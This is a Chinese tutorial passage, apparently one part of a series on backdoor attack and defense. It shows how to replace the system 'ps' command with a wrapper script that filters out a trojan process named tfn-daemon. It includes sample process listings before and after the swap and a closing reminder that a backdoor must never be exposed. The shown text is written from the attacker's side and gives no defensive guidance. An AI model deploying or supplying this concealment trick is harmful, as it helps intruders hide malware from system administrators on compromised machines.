“后门”的攻击与防御

核心提示： 首先，我们把这个shell也命名为ps，“后门”的攻击与防御(7)，然后输入以下的内容#!/bin/sh/bin/ps $* | grep -v tfn-daemon | grep -v grep记得把这个shell的权限改正确，下面我们来解释一下这句shell的含义$*表示的是这个she

首先，我们把这个shell也命名为ps，然后输入以下的内容

#!/bin/sh
　　/bin/ps $* | grep -v tfn-daemon | grep -v grep

记得把这个shell的权限改正确，下面我们来解释一下这句shell的含义

$*表示的是这个shell获取的所有参数，ps $* 表示调用系统的命令ps加参数来例出进程列表，然后将结果重定向到 grep –v tfn-daemon这句里，而这一条命令的意思则是从前面ps命令列出的所有进程中，把含有关键字 tfn-daemon的这个进程去掉，最后一句则表示把grep命令本身去掉，当然这一句可用也可不用。好了，让我们整体上来看看执行了这个shell之后的效果吧：

首先，我们用系统的ps –aux命令来列出进程，得到类似这样的结果：

postfix　13922　0.0　1.7 13108 2232 ?　　S　Oct17　 0:00 /usr/sbin/httpd
　　skylove　9641　0.0　0.2　1444　284 ?　　 S　11:34　 0:00 tfn-daemon
　　postfix　15943　0.0　0.7　3148　988 ?　　S　16:00　 0:00 pickup -l -t fifo -u
　　skylove　17083　0.0　1.4　6800 1784 ?　　S　16:48　 0:00 /usr/sbin/sshd

接着用./ps –aux 执行我们的shell的结果，则得到的是：

postfix　13922　0.0　1.7 13108 2232 ?　　S　Oct17　 0:00 /usr/sbin/httpd
　　postfix　15943　0.0　0.7　3148　988 ?　　S　16:00　 0:00 pickup -l -t fifo -u
　　skylove　　 17083　0.0　1.4　6800 1784 ? S　16:48　 0:00 /usr/sbin/sshd

看到没？？ 显示我们木马的那条进程就此不再显示了！这样一来，就做到了我们的进程的隐藏。而且对待任何的真实ps命令的合法参数都可以成功执行，包括无参数的情形——时刻要记得，做后门玩的是“合金装备”，暴露一次就完蛋！